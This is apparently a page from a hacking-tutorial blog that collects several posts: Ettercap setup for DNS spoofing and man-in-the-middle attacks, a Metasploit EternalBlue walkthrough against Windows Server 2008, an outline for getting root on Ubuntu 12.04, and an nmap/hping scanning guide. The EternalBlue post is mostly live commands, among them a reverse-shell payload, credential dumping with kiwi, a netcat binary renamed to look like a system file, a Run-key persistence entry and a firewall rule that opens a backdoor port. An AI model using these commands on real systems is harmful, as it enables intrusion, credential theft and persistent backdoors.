TRENDING NOW

best sinhala blog in sri lanka
Hi all this is the gcam mod Pixel 4 Google Camera 7.0








best sinhala blog in sri lanka
Hi All today i am going to show how to do a DNS Spoof Attack


So first of all i am going to show how the network map is





Before start i am going to describe what is What is man in the middle attack.

What is man in the middle attack

A man in the middle (MITM) attack is a general term for when a attacker positions himself in a conversation between a user and an application


Why man in the middle attack ?

To Steal personal information ( login credentials, account details and credit card numbers)


Common Targets

Financial applications
SaaS businesses
e-commerce sites and other websites where logging in is required.


Results


  • Identity Theft
  • Unapproved fund transfers
  • Password change
  • Gain a access to a secured perimeter


Types of MITMA


  • IP spoofing
  • DNS spoofing
  • HTTPS spoofing
  • SSL hijacking
  • Email hijacking
  • Wi-Fi eavesdropping
  • Stealing browser cookies




So now we can Start our Lesson

On Hacker Machine

Kali Linux Latest


On Target Machine Windows 10 Latest



Load config file

/etc/ettecap/etter.conf



edit config file with following

change the “ec_uid” and “ec_gid” values to 0

after that find and uncomment these two lines:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"




Save changes


Then Load Ettercap by searching from the application list or execute sudo -E ettercap -G this in terminal





Now you can watch this Video to get a clear idea










best sinhala blog in sri lanka
Hi All Today im going to show how to hack Windows Server 2008 with Fresh installation



All you can find thing by looking at following Video




These are the commands 


Find and load Exploit


Get a terminal

#metasploit

msf5 > search eternalblue

msf5 > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options

msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.43.42 [Your target ip]


msf5 exploit(windows/smb/ms17_010_eternalblue) > show payloads

msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp

msf5 exploit(windows/smb/ms17_010_eternalblue) > show options
msf5 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.43.244 [Your ip]
msf5 exploit(windows/smb/ms17_010_eternalblue) > run

After exploit we can execute this 


To Load cmd.exe 
meterpreter > shell

C:\Windows\system32>whoami
C:\Windows\system32>exit


To get all Usernames and Passwords

meterpreter > 
meterpreter > load kiwi
meterpreter > creds_all



Upload netcat to server and rename it a look like system executable


meterpreter > upload /usr/share/windows-binaries/nc.exe svchostn.exe

meterpreter > reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v svchostn -d 'C:\Windows\system32\svchostn.exe -Ldp 7777 -e cmd.exe'

meterpreter > reg queryval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v svchostn


View Firewall Rules and apply new rules


meterpreter > shell

C:\Windows\system32>netsh  firewall show opmode

C:\Windows\system32>  
netsh advfirewall firewall add rule name="Service Window" dir=in action=allow protocol=TCP localport=7777

C:\Windows\system32>exit

meterpreter > execute -f svchostn.exe -Ldp 7777 -e cmd.exe



On New window



nc 192.168.43.42 7777





best sinhala blog in sri lanka
Hi all today im going to show how to get root shell in Ubuntu 12.04.5 version

First of all read this post to get how to get riverse shell from webserver

After you have get a shell from web server, i will continue this



And create named pipes file in /tmp folder



Then pass that to Hacker’s Machine via netcat




Capture that from kali machine





From that, open /bin/bash from python to get more interactive shell






Then get ubuntu and kernel version of that ubuntu machine





From another terminal window, update the searchsploit database





Then search available exploit to that version





Copy to different location





open http server to transfer the exploit to ubuntu machine








Download that file from the terminal





Now compile that using gcc





Now run that exploit to get root shell




Successfully get a root privilege from that


best sinhala blog in sri lanka

As i describe how to scan with nmap in this article,  today i am goiing to show how to scan network in a advanced way.


1 . Layout





Im using python HTTP server in different ports such as on , off, well known and less known ports to demonstrate how this is working


First of all we can discuss how the Transmission Control Protocol Breakdown



Each TCP packet has a section in it’s memory buffer where Control Bits such as URG | ACK | PSH | RST | SYN | FIN can be set.





So How is this URG, ACK, PSH, RST, SYN, FIN works?


here is a small photo that describes all

Image result for how tcp connection is established



Can we change the state SYN to ACK ?


  • yes, that is possible. thats why we need nmap and hping for that



from those tools we can send specific control bits in packets which we are send.


Let's discuss how ip scanners are working


Normally they scanning via icmp


So First of all i scanned my network




so 103 is my ubuntu ip



So simply i disabled icmp in ubuntu



and edit 1 to 0



then again i tried to scan the network




Boom! it not discovering

Then i tried to ping ubuntu machine





it was unsuccessful


SYN Scan


So i was tried to scan using syn scan

#hping : hping -S <address block>
#Nmap : nmap -sS <address block>
#fping : fping -a -g <address block>


hping
-S : Sets the SYN flag getting passed onto the packet

nmap
-sS : SYN flag scan
-sn: ICMP ECHO scan




This is how wireshark looks like when running syn scan


I used firewall to block the 80 port and check syn scan


then enable port 80 in the firewall and tried



Boom! it received SYN,ACK flag



RST scan



ACK Scan





NULL Scan

hping -F -P -U <ip address>

in this command you can see it has multiple Flags





Nmap commands are :
-sX (Xmas scan)
-sN (Null scan)